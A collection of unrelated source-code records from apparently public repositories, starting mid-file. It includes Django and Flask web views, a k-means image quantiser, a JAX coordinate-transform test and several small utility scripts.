line.__contains__(\"e\") or line.__contains__(\"i\") or line.__contains__(\n \"o\") or line.__contains__(\"u\"):\n return True\n else:\n return False\n\n\ndef listOfAnime(x):\n animeList = open(\"/Users/marcobarreirinhas/Programs/Python/AnimeList.txt\", \"r\")\n animeWList = []\n animeNFList = []\n animeNSList = []\n linksList = []\n\n ok1 = False\n ok2 = False\n ok3 = False\n ok4 = False\n\n for lines in animeList:\n\n lines = lines.strip(\"\\n\")\n\n if lines.__contains__(\"Watched\"):\n ok1 = True\n elif lines.__contains__(\"Not Finished\"):\n ok2 = True\n ok1 = False\n elif lines.__contains__(\"Not Started\"):\n ok3 = True\n ok2 = False\n elif lines.__contains__(\"Links\"):\n ok4 = True\n ok3 = False\n elif lines.__contains__(\"Animes\"):\n ok3 = False\n\n if ok1:\n if not lines.__contains__(\"Watched\"):\n if isText(lines):\n animeWList.append(lines[lines.index(\")\") + 2:])\n elif ok2:\n if not lines.__contains__(\"Not Finished\"):\n if isText(lines):\n animeNFList.append(lines[lines.index(\")\") + 2:])\n elif ok3:\n\n if not lines.__contains__(\"Not Started\"):\n if isText(lines):\n animeNSList.append(lines[lines.index(\")\") + 2:])\n elif ok4:\n if not lines.__contains__(\"Links\"):\n if not lines.__contains__(\"Links\"):\n if isText(lines):\n linksList.append(lines)\n\n if x == 1:\n animeWList.sort()\n return animeWList\n elif x == 2:\n animeNFList.sort()\n return animeNFList\n elif x == 3:\n animeNSList.sort()\n return animeNSList\n elif x == 4:\n linksList.sort()\n return linksList\n else:\n return []\n\n\ndef write(AW, NF, NS):\n animeW = AW\n animeNF = NF\n animeNS = NS\n links = listOfAnime(4)\n\n countW = len(animeW)\n countNF = len(animeNF)\n countNS = len(animeNS)\n\n animeList2 = open(\"/Users/marcobarreirinhas/Programs/Python/AnimeList2.txt\", \"w\")\n\n count = 1\n\n animeList2.write(\"Animes\\n\\n\\n\")\n animeList2.write(\"Watched/In progress(\" + str(countW) + \"):\\n\")\n for n in animeW:\n animeList2.write(\"\\n\")\n animeList2.write(str(count) + \") \" + n)\n count += 1\n\n count = 1\n animeList2.write(\"\\n\\n\\n\")\n animeList2.write(\"Not Finished(\" + str(countNF) + \"):\\n\")\n for n in animeNF:\n animeList2.write(\"\\n\")\n animeList2.write(str(count) + \") \" + n)\n count += 1\n count = 1\n animeList2.write(\"\\n\\n\\n\")\n animeList2.write(\"Not Started(\" + str(countNS) + \"):\\n\")\n for n in animeNS:\n animeList2.write(\"\\n\")\n animeList2.write(str(count) + \") \" + n)\n count += 1\n\n animeList2.write(\"\\n\\n\\nAnimes watched: \" + str(countW))\n animeList2.write(\"\\nAnimes not finished: \" + str(countNF))\n animeList2.write(\"\\nAnimes not started: \" + str(countNS))\n animeList2.write(\"\\nTotal number of Animes: \" + str(countW + countNF + countNS))\n\n animeList2.write(\"\\n\\n\")\n animeList2.write(\"Links:\")\n for n in links:\n animeList2.write(\"\\n\")\n animeList2.write(n)\n","repo_name":"CedoispirDB/commands.py","sub_path":"OrganizeAnimeList1.0/alphabetiz.py","file_name":"alphabetiz.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15263345955","text":"from django.db.models.functions import Coalesce, Lower\n\nfrom products.models import Product\n\n\nclass Manager:\n __query = None\n __products = None\n __products_output = []\n\n def __call__(self, query):\n self.__initialize(query)\n self.__obtain_products()\n self.__format_product_output()\n\n return self.__products_output\n\n def __initialize(self, query):\n self.__query = query\n\n def __obtain_products(self):\n self.__products = Product.objects.order_by('rate').all().reverse()\n\n def __format_product_output(self):\n self.__products_output.clear()\n for product in self.__products:\n icon, image = self.__obtain_medias_url(product)\n formatted_product = {\n 'id': product.id,\n 'title': product.title,\n 'url': product.url,\n 'summary': product.summary(),\n 'icon': icon,\n 'image': image,\n 'rate': product.rate,\n 'hunter': product.user.username,\n 'published': product.published_pretty(),\n }\n self.__products_output.append(formatted_product)\n\n def __obtain_medias_url(self, product):\n try:\n icon = ''\n if product.icon is not None:\n icon = product.icon.url\n image = ''\n if product.image is not None:\n image = product.image.url\n except ValueError:\n icon = ''\n image = ''\n\n return icon, image\n\n\nclass Query:\n __user_id = None\n\n def __init__(self, user_id=None):\n self.__user_id = user_id\n\n def get_user_id(self):\n return self.__user_id\n","repo_name":"carpancan/producthunt","sub_path":"products/src/query/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17775658011","text":"import os\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom transformers import pipeline, AutoTokenizer\n\nfrom Pagina import clasificador\n\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET', 'POST'])\n@app.route(\"/index.html\", methods=['GET', 'POST'])\ndef escribirTexto():\n \"\"\"\n Función para escribir texto en la web.\n Devuelve:\n - El render de la vista index.html\n \"\"\"\n os.chdir(\"ModelosDefinitivos\")\n listaModelos = os.listdir()\n os.chdir('..')\n\n datos = { # Unidad de transporte de intercambio de datos entre el controlador y la vista.\n 'titulo': 'Clasificador',\n 'etiqueta': '',\n 'score': '',\n 'modelo': listaModelos[0],\n 'error': '',\n 'listaModelos': listaModelos\n }\n\n if request.method == \"POST\": # Recibimos el POST.\n print(\"POST recibido, contenido:\", request.form.get('texto'))\n texto = request.form.get('texto') # Extraemos texto.\n modelo = request.form.get('modelo') # Estraemos modelo.\n\n datos['listaModelos']=clasificador.setUltimoModeloUsado(listaModelos,modelo)\n datos['modelo'] = modelo\n print(\"modelo\",modelo)\n if texto!=\"\": # Clasificamos el texto.\n etiqueta,score=clasificador.clasificar(texto, modelo)\n datos['etiqueta']=etiqueta\n datos['score']=score\n else:\n datos['error'] = \"Debe introducir un texto\"\n return render_template('index.html', data=datos)\n\n\n@app.route(\"/subirArchivo.html\", methods=['GET', 'POST'])\ndef subirArchivo():\n \"\"\"\n Función para subir un archivo docx en la web.\n Devuelve:\n - El render de la vista subirArchivo.html\n \"\"\"\n os.chdir(\"ModelosDefinitivos\")\n listaModelos = os.listdir()\n os.chdir('..')\n datos = { # Unidad de transporte de intercambio de datos entre el controlador y la vista.\n 'titulo': 'Clasificador',\n 'etiqueta': '',\n 'score': '',\n 'modelo': listaModelos[0],\n 'error': '',\n 'listaModelos': listaModelos\n }\n if request.method == \"POST\": # Recibimos el POST.\n archivo = request.files['file']\n modelo = request.form.get('modelo')\n datos['listaModelos'] = clasificador.setUltimoModeloUsado(listaModelos,modelo)\n datos['modelo'] = modelo\n print(modelo)\n if archivo.filename != \"\": # Comprobamos si hay archivo subido.\n archivo.save(archivo.filename)\n import docx2txt\n import glob # Lectura y procesado de los archivos.\n formatoValido = False\n for filename in glob.glob('*.docx'):\n with open(os.path.join(os.getcwd(), filename), 'r') as f:\n texto = docx2txt.process(filename) # Extraemos el texto del documento.\n if (texto != \"\"): # Comprobamos si el archivo no está vacío.\n print(filename, \" Leído\")\n # print(texto)\n etiqueta, score = clasificador.clasificar(texto, modelo)\n datos['etiqueta'] = etiqueta\n datos['score'] = score\n print(etiqueta, score)\n print(os.getcwd())\n formatoValido = True\n os.remove(archivo.filename)\n if formatoValido == False:\n datos['error'] = \"Solo se acepta formato .docx\"\n else:\n datos['error'] = \"Debe introducir un archivo .docx\"\n\n return render_template('subirArchivo.html', data=datos)\n\n\n\ndef query_string():\n print(request)\n print(request.args)\n print(request.args.get('param'))\n return \"Ok\"\n\n\ndef error(error):\n os.chdir(\"ModelosDefinitivos\")\n listaModelos = os.listdir()\n os.chdir('..')\n envio = {\n 'titulo': 'Clasificador',\n 'modelos': '',\n 'listaModelos': listaModelos\n }\n envio['modelos'] = \"\"\n return render_template('paginaError.html', data=envio), 404\n # return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.add_url_rule('/consulta', view_func=query_string) # Enlazamos la funcion a la url forma, distinta a la anterior.\n app.register_error_handler(404, error) # Manejador del error.\n\n app.run(debug=True, port=5000)\n","repo_name":"jbmr0001/TFG-Clasificador-Autom-tico-Denuncias","sub_path":"Pagina/controladorPagina.py","file_name":"controladorPagina.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71739379628","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 27 07:18:28 2021\r\n\r\n@author: felip\r\n\"\"\"\r\n\r\nimport math\r\nfrom matplotlib import pyplot\r\n\r\ndef PuntoFijoCalcular(funcion,funcion2, referencia, tolerancia, iter):\r\n iteracionN = 1\r\n aux = 1\r\n condicion = True\r\n while condicion:\r\n x = funcion2(referencia)\r\n #print('Iteracion numero %d, el valor del punto fijo = %0.6f y la funcion en este punto = %0.6f' % (iteracionN, x, funcion(x)))\r\n referencia = x\r\n\r\n iteracionN = iteracionN + 1\r\n \r\n if iteracionN > iter:\r\n aux=0\r\n print(\"\\nSe alcanzo el maximo de iteraciones\")\r\n break\r\n \r\n condicion = abs(funcion(x)) > tolerancia\r\n \r\n if aux==1:\r\n print('\\nLa raiz para esta funcion es: %0.8f y la funcion en este punto = %0.8f' % (x, funcion(x)))\r\n print(\"Tolerancia: \",abs(funcion(x)),\" Iteraciones: \", iteracionN)\r\n else:\r\n print('El valor del punto fijo = %0.8f y la funcion en este punto = %0.8f' % (x, funcion(x)))\r\n print(\"Tolerancia: \",abs(funcion(x)),\" Iteraciones: \", iteracionN)\r\n \r\nTOL= 10**(-10)\r\nn=10000\r\nr=-1\r\n\r\n#funcion\r\nf1 = lambda x: x**3 + 2*x + math.sqrt(4+2)\r\n\r\n#funcion de aproximación\r\ng1 = lambda x: (-(x**3)-math.sqrt(4+2))/2\r\n\r\nx = range(-2, 2)\r\npyplot.plot(x, [f1(i) for i in x])\r\npyplot.axhline(0, color=\"black\")\r\npyplot.axvline(0, color=\"black\")\r\n\r\nrespuesta = PuntoFijoCalcular(f1,g1,r,TOL,n)\r\n ","repo_name":"LuisAyala7324/Analisis-2130","sub_path":"Parciales/Parcial 1/Parcial 1.py","file_name":"Parcial 1.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35684532064","text":"from django.shortcuts import render\nfrom incidencia.models import incidencia\nfrom django.forms import model_to_dict\nfrom alumnos.models import alumnos\nfrom aula.models import aula\nfrom django.http import JsonResponse,HttpResponse\nimport json\nfrom login.models import usuario\nfrom django.contrib.auth.decorators import login_required\n#pdf\nfrom io import BytesIO\nimport xhtml2pdf.pisa as pisa\n\n@login_required\ndef index_incident(request,id):\n user=usuario.objects.get(dni=request.user)\n aulas=aula.objects.get(idAula=id,user=user)\n incidents = incidencia.objects.filter(aula=aulas,user=user).distinct()\n students = alumnos.objects.filter(aula=aulas,user=user)\n return render(request, \"incident.html\", {'incidents': incidents, 'students': students})\n\n@login_required\ndef save_incident(request):\n try:\n if (request.method == 'POST'):\n user=usuario.objects.get(dni=request.user)\n\n data = json.loads(request.body)\n classroom = data.get('classroom')\n object_classroom = aula.objects.get(idAula=classroom,user=user)\n date = data.get('date')\n description = data.get('description')\n array_students = data.get('students')\n object_incident = incidencia.objects.create(user=user,\n fecha=date, descripcion=description, aula=object_classroom)\n for n in array_students:\n object_student = alumnos.objects.get(idAlumno=n,user=user)\n object_incident.alumno.add(object_student)\n dicc = {'idIncidente': object_incident.idIncidencia,\n 'fecha': object_incident.fecha, 'descripcion': object_incident.descripcion}\n return JsonResponse(json.dumps(dicc), safe=False)\n\n except Exception as ex:\n print(ex)\n return JsonResponse({'response': 'error'})\n\n@login_required\ndef get_students(request, id):\n try:\n\n if (request.method == 'GET'):\n user=usuario.objects.get(dni=request.user)\n\n object_incident = incidencia.objects.get(idIncidencia=id,user=user)\n object_students = alumnos.objects.filter(user=user,\n incidencia=object_incident)\n dicc = []\n for n in object_students:\n object_dicc = {'apellidos': n.apellidos, 'nombres': n.nombres}\n dicc.append(object_dicc)\n return JsonResponse(json.dumps(dicc), safe=False)\n except Exception as ex:\n print(ex)\n return JsonResponse({'response': 'error'})\n\n@login_required\ndef delete_incident(request, id):\n try:\n if (request.method == 'DELETE'):\n user=usuario.objects.get(dni=request.user)\n\n incidencia.objects.get(idIncidencia=id,user=user).delete()\n return JsonResponse({'response': 'success'})\n\n except Exception as ex:\n return JsonResponse({'response': 'error'})\n\n@login_required\ndef pdf(request):\n html=request.POST.get('html','')\n archive=BytesIO()\n pdf=pisa.pisaDocument(BytesIO(html.encode(\"ISO-8859-1\")),archive)\n if not pdf.err:\n response=HttpResponse(archive.getvalue(),content_type='application/pdf')\n response['content-disposition']='attachment; filename = \"Incidencia.pdf\"'\n return response\n ","repo_name":"dsotoch/web-git","sub_path":"Regialu/regialu/incidencia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15795645918","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\n@dataclass\nclass DeviceDetail(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # Indicates the browser information of the used for signing in.\n browser: Optional[str] = None\n # Refers to the UniqueID of the device used for signing in.\n device_id: Optional[str] = None\n # Refers to the name of the device used for signing in.\n display_name: Optional[str] = None\n # Indicates whether the device is compliant.\n is_compliant: Optional[bool] = None\n # Indicates whether the device is managed.\n is_managed: Optional[bool] = None\n # The OdataType property\n odata_type: Optional[str] = None\n # Indicates the operating system name and version used for signing in.\n operating_system: Optional[str] = None\n # Provides information about whether the signed-in device is Workplace Joined, AzureAD Joined, Domain Joined.\n trust_type: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> DeviceDetail:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: DeviceDetail\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return DeviceDetail()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n fields: Dict[str, Callable[[Any], None]] = {\n \"browser\": lambda n : setattr(self, 'browser', n.get_str_value()),\n \"deviceId\": lambda n : setattr(self, 'device_id', n.get_str_value()),\n \"displayName\": lambda n : setattr(self, 'display_name', n.get_str_value()),\n \"isCompliant\": lambda n : setattr(self, 'is_compliant', n.get_bool_value()),\n \"isManaged\": lambda n : setattr(self, 'is_managed', n.get_bool_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"operatingSystem\": lambda n : setattr(self, 'operating_system', n.get_str_value()),\n \"trustType\": lambda n : setattr(self, 'trust_type', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_str_value(\"browser\", self.browser)\n writer.write_str_value(\"deviceId\", self.device_id)\n writer.write_str_value(\"displayName\", self.display_name)\n writer.write_bool_value(\"isCompliant\", self.is_compliant)\n writer.write_bool_value(\"isManaged\", self.is_managed)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_str_value(\"operatingSystem\", self.operating_system)\n writer.write_str_value(\"trustType\", self.trust_type)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/device_detail.py","file_name":"device_detail.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"70447661546","text":"import socket\nimport tkinter as tk\n\ndef handle_response(response):\n if response == b\"1\":\n tk.messagebox.showinfo(\"Результат\", \"Да\")\n else:\n tk.messagebox.showinfo(\"Результат\", \"Нет\")\n\ndef send_request():\n HOST = '127.0.0.1'\n PORT = 12345\n\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((HOST, PORT))\n\n data = client_socket.recv(1024)\n handle_response(data)\n\nroot = tk.Tk()\nbutton = tk.Button(root, text=\"Пойдем курить?\", command=send_request)\nbutton.pack()\nroot.mainloop()\n","repo_name":"vladislavten/my_work2","sub_path":"myWork/smokeclient.py","file_name":"smokeclient.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38169890481","text":"import chex\nimport jax\nfrom jax import numpy as jnp\nimport numpy as np\nimport boltzgen as bg\nimport torch\n\nfrom eacf.targets.data import load_aldp\nfrom eacf.utils.coordinate_transform import internal\n\n\ndef test_internal_transform():\n USE_64_BIT = True\n if USE_64_BIT:\n from jax.config import config\n config.update(\"jax_enable_x64\", True)\n\n # Load aldp data\n train_set, _, _ = load_aldp(train_path='eacf/targets/data/aldp_500K_train_mini.h5')\n # Get positions\n ndim = 66\n if jax.config.jax_enable_x64:\n dtype = jnp.float64\n else:\n dtype = jnp.float32\n data_jax = jnp.array(train_set.positions.reshape(-1, ndim), dtype=dtype)\n\n # Reference transform\n data_torch = torch.tensor(np.array(data_jax).reshape(-1, ndim),\n dtype=torch.float64)\n z_matrix = [\n (0, [1, 4, 6]),\n (1, [4, 6, 8]),\n (2, [1, 4, 0]),\n (3, [1, 4, 0]),\n (4, [6, 8, 14]),\n (5, [4, 6, 8]),\n (7, [6, 8, 4]),\n (9, [8, 6, 4]),\n (10, [8, 6, 4]),\n (11, [10, 8, 6]),\n (12, [10, 8, 11]),\n (13, [10, 8, 11]),\n (15, [14, 8, 16]),\n (16, [14, 8, 6]),\n (17, [16, 14, 15]),\n (18, [16, 14, 8]),\n (19, [18, 16, 14]),\n (20, [18, 16, 19]),\n (21, [18, 16, 19])\n ]\n cart_indices = [8, 6, 14]\n ind_circ_dih = [0, 1, 2, 3, 4, 5, 8, 9, 10, 13, 15, 16]\n transform_bg = bg.flows.internal.CompleteInternalCoordinateTransform(ndim, z_matrix,\n cart_indices, data_torch,\n ind_circ_dih=ind_circ_dih)\n\n # jax transform\n transform_jax = internal.CompleteInternalCoordinateTransform(\n ndim, z_matrix, cart_indices, data_jax, ind_circ_dih=ind_circ_dih)\n\n # Check forward consistency\n batch_size = 10\n x_torch = data_torch[:batch_size]\n x_jax = data_jax[:batch_size]\n z_torch, log_det_torch = transform_bg.forward(x_torch)\n z_jax, log_det_jax = transform_jax.forward(x_jax)\n rtol = 5e-3\n chex.assert_tree_all_close(jnp.array(z_torch.numpy()), z_jax, rtol=rtol)\n chex.assert_tree_all_close(jnp.array(log_det_torch.numpy()), log_det_jax, rtol=rtol)\n\n # Check inverse consistency\n x_jax_, log_det_jax_ = transform_jax.inverse(z_jax)\n chex.assert_tree_all_close(log_det_jax + log_det_jax_,\n jnp.zeros_like(log_det_jax), atol=1e-4)\n x_jax__ = transform_jax.inverse(transform_jax.forward(x_jax_)[0])[0]\n chex.assert_tree_all_close(x_jax_, x_jax__, rtol=rtol)\n x_torch_, log_det_torch_ = transform_bg.inverse(torch.as_tensor(np.array(z_jax)))\n chex.assert_tree_all_close(jnp.array(x_torch_.numpy()), x_jax_, rtol=rtol, atol=3e-4)\n chex.assert_tree_all_close(jnp.array(log_det_torch_.numpy()), log_det_jax_, rtol=rtol)\n\n # Test vmap\n z_vmap, log_det_vmap = jax.vmap(transform_jax.forward)(x_jax)\n chex.assert_tree_all_close(z_vmap, z_jax, rtol=rtol)\n chex.assert_tree_all_close(log_det_vmap, log_det_jax, rtol=rtol)\n x_vmap, log_det_vmap_ = jax.vmap(transform_jax.inverse)(z_jax)\n chex.assert_tree_all_close(x_vmap, x_jax_, rtol=rtol)\n chex.assert_tree_all_close(log_det_vmap_, log_det_jax_, rtol=rtol)\n\n # Test jit\n fwd_jit = jax.jit(transform_jax.forward)\n z_jit, log_det_jit = fwd_jit(x_jax)\n chex.assert_tree_all_close(z_jit, z_jax, rtol=rtol)\n chex.assert_tree_all_close(log_det_jit, log_det_jax, rtol=rtol)\n inv_jit = jax.jit(transform_jax.inverse)\n x_jit, log_det_jit_ = inv_jit(z_jax)\n chex.assert_tree_all_close(x_jit, x_jax_, rtol=rtol)\n chex.assert_tree_all_close(log_det_jit_, log_det_jax_, rtol=rtol)\n\n\nif __name__ == '__main__':\n test_internal_transform()\n\n","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/utils/coordinate_transform/internal_test.py","file_name":"internal_test.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"830390531","text":"import logging\nimport logstash\nfrom jaeger_client import Config\nfrom statsd import StatsClient\n\nfrom uggipuggi.constants import SERVER_RUN_MODE\n\n\ndef init_statsd(prefix=None, host='statsd', port=8125):\n statsd = StatsClient(host, port, prefix=prefix)\n return statsd\n\n\ndef init_logger(log_level=logging.INFO):\n logger = logging.getLogger()\n logger.addHandler(logstash.TCPLogstashHandler('logstash', 5000, version=1))\n if SERVER_RUN_MODE == 'DEBUG':\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(log_level)\n return logger\n\n\ndef init_tracer(service):\n config = Config(\n config={\n 'sampler': {\n 'type': 'const',\n 'param': 1,\n },\n 'local_agent': {\n 'reporting_host': \"jaeger\",\n 'reporting_port': 5775,\n },\n 'logging': True,\n 'reporter_batch_size': 1,\n },\n\n service_name=service,\n )\n\n # this call also sets opentracing.tracer\n return config.initialize_tracer()\n","repo_name":"krishnadubba/up_be_falcon","sub_path":"uggipuggi/helpers/logs_metrics.py","file_name":"logs_metrics.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70528524906","text":"import requests\nimport base64\nimport os\nimport random\nfrom dotenv import load_dotenv, find_dotenv\nfrom flask import Flask, render_template\nfrom genius import get_lyric_link\nfrom spotify import get_spotify_response\n\napp = Flask(__name__)\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n@app.route('/')\ndef spotify_app():\n #get the return data from spotify.py\n return_data = get_spotify_response()\n \n # information to display on html\n # list of songs and links to their spotify page\n song_list = []\n song_link_list = []\n for songs in return_data['tracks']:\n song_list.append(songs['name'])\n song_link_list.append(songs['external_urls']['spotify'])\n num_songs = len(song_list)\n \n # get random track\n random_track_num = random.randint(1, len(return_data['tracks']))\n random_track = return_data['tracks'][random_track_num-1]\n \n # get the song name\n song_name = random_track['name']\n \n # get all the artists related to this song\n artists_name = []\n for artists in random_track['artists']:\n artists_name.append(artists['name'])\n \n # get the link to the album image\n image_link = random_track['album']['images'][1]['url']\n \n #get the song preview url\n song_preview = random_track['preview_url']\n \n #get the link of the song chosen to be previewed\n song_link = random_track['external_urls']['spotify']\n \n # if there is no preview, then give the song_preview variable a string to compare in jinja\n if(song_preview == None):\n song_preview = \"None\"\n \n # get the link to the lyrics using Genius API\n # lyric_link = get_lyric_link(song_name)\n \n # render html file:\n return render_template(\n \"index.html\",\n songName=song_name,\n artistNames=artists_name,\n imageLink=image_link,\n songPreview=song_preview,\n songLink=song_link,\n # lyricLink=lyric_link,\n songList=song_list,\n numSongs=num_songs,\n songLinkList=song_link_list)\n\n# run the flask app\napp.run(\n port=int(os.getenv('PORT', 8080)),\n host=os.getenv('IP', '0.0.0.0'),\n debug=True\n)\n\n","repo_name":"NJIT-CS490-SP21/project1-hv72","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73201489068","text":"import numpy as np\nfrom numpy import linalg\nfrom tqdm import trange\nimport cv2\n\nclass Kmeans(object):\n\n def __init__(self, source_image, k=16):\n self.training_x = source_image.copy().reshape(-1, 3)\n self.label = np.zeros(self.training_x.shape[0])\n self.mu = np.random.randint(low=0, high=255, size=(k, 3)).astype(np.float64)\n self.k = k\n\n def train(self):\n x = self.training_x\n epsilon = 1e-5\n loop_count = 0\n # 最多loop 100次\n for loop in trange(100):\n loop_count += 1\n pre_mu = self.mu.copy()\n # 计算每个sample对应的group\n for i, xi in enumerate(x):\n # 选取对于sample xi来说,最近的group作为label,距离度量使用L2-Norm ^ 2\n self.label[i] = np.argmin(linalg.norm(xi - self.mu, axis=1, keepdims=True) ** 2)\n # 更新每个group的 mu_j 对应的颜色\n for j in range(self.k):\n # 判断group j是否有数据点\n if (self.label == j).any():\n self.mu[j] = np.sum(x[self.label == j], axis=0) / np.sum(self.label == j)\n\n if (linalg.norm(self.mu - pre_mu, axis=1, keepdims=True) < epsilon).all():\n break\n\n return loop_count\n\n def reassign(self, img):\n new_img = img.copy().astype(np.float64)\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n k = np.argmin(linalg.norm(new_img[i][j] - self.mu, axis=1, keepdims=True) ** 2)\n new_img[i][j] = self.mu[k]\n\n return new_img\n\nif __name__ == \"__main__\":\n large_img = cv2.imread('data6/bird_large.tiff')\n small_img = cv2.imread('data6/bird_small.tiff')\n for k in [16, 32, 64, 128]:\n print(f'{k} bit colors')\n for i in range(10):\n kmeans = Kmeans(small_img, k=k)\n kmeans.train()\n new_img = kmeans.reassign(large_img)\n cv2.imwrite('data6/bird_large_after_{}_with_k_{}.tiff'.format(i, k), np.uint8(np.round(new_img)))\n","repo_name":"cliche9/Machine-Learning-2021-Fall","sub_path":"exp6/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70446887789","text":"# Input the initial and final times to read as time0 and timef.\n# Time range from Lee et al. 2019 (6:20-6:48 UTC)\ndef read_flighttrack( time0, timef ):\n import xarray as xr\n\n # Read in-situ data\n # In-situ not filtered for whole-second values\n #daten = xr.open_dataset('obs/stratoclim2017.geophysika.0808_1.master.ci_eval.nc')\n bd = '/xdisk/sylvia/tropic_vis/'\n daten = xr.open_dataset( bd + 'obs/stratoclim2017.geophysika.0808_1.filtered_per_sec.nc' )\n\n # Extract values between time0 and timef\n zeit = daten['time'].sel( time=slice(time0, timef) )\n alt = daten['BEST:ALT'].sel( time=slice(time0, timef) )\n qv_flash = daten['BEST:H2O_gas'].sel( time=slice(time0, timef) )\n qv_fish = daten['BEST:H2O_enh'].sel( time=slice(time0, timef) )\n qi = daten['BEST:IWC'].sel( time=slice(time0, timef) )\n temp = daten['BEST:TEMP'].sel( time=slice(time0, timef) )\n theta = daten['BEST:THETA'].sel( time=slice(time0, timef) )\n rhice_flash = daten['BEST:RH_ice_gas'].sel( time=slice(time0, timef) )\n rhice_fish = daten['BEST:RH_ice_enh'].sel( time=slice(time0, timef) )\n\n #lat = daten['BEST:LAT'].sel( time=slice(time0, timef) )\n #lon = daten['BEST:LON'].sel( time=slice(time0, timef) )\n #print('In-situ lat min: ' + str(lat.min(skipna=True).values) + ' // In-situ lat max: ' + str(lat.max(skipna=True).values))\n #print('In-situ lon min: ' + str(lon.min(skipna=True).values) + ' // In-situ lon max: ' + str(lon.max(skipna=True).values))\n\n # Extract corresponding altitudes and times for different variables according to their non-zero values\n alt1 = alt.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) ).values\n t1 = zeit.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) )\n qv_flash = qv_flash.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) )\n qv_fish = qv_fish.where( (alt > 0) & (qv_flash > 0) & (qv_fish > 0) )\n\n alt2 = alt.where( (alt > 0) & (qi > 0) )\n qi = qi.where( (alt > 0) & (qi > 0) )\n\n alt3 = alt.where( (temp > 0) & (theta > 0) )\n temp = temp.where( (temp > 0) & (theta > 0) )\n theta = theta.where( (temp > 0) & (theta > 0) )\n\n alt4 = alt.where( (rhice_flash > 0) & (rhice_fish > 0) )\n rhice_flash = rhice_flash.where( (rhice_flash > 0) & (rhice_fish > 0) )\n rhice_fish = rhice_fish.where( (rhice_flash > 0) & (rhice_fish > 0) )\n\n return alt1, qv_flash, qv_fish, alt2, qi, alt3, temp, theta, alt4, rhice_flash, rhice_fish\n\n\n# Group the flight track values into altitudinal bins from min_alt to max_alt\ndef bin_flighttrack( min_alt, max_alt, alt1, qv_flash, qv_fish, alt2, qi, alt3, temp, theta, alt4, rhice_flash, rhice_fish ):\n import xarray as xr\n import numpy as np\n\n basedir = '/xdisk/sylvia/'\n\n # Define the simulation bins from the vertical grid file\n vgrid = xr.open_dataset(basedir + 'vgrid_icon-grid_tropic_55e115e5s40n.nc')\n alt = vgrid.vct_a.values[:,0]\n j = np.argwhere( (alt >= min_alt) & (alt <= max_alt) )\n bins_sims = alt[j[:,0]]\n\n # Binning in altitude between and with bins, which elements go in which bin?\n # Make a multidimensional list of alt and h2o values in each.\n #u = 14000\n #d = 22000\n #n = 70\n\n # np.digitize returns the indices of the bins to which each element in alt* belongs.\n #i1 = 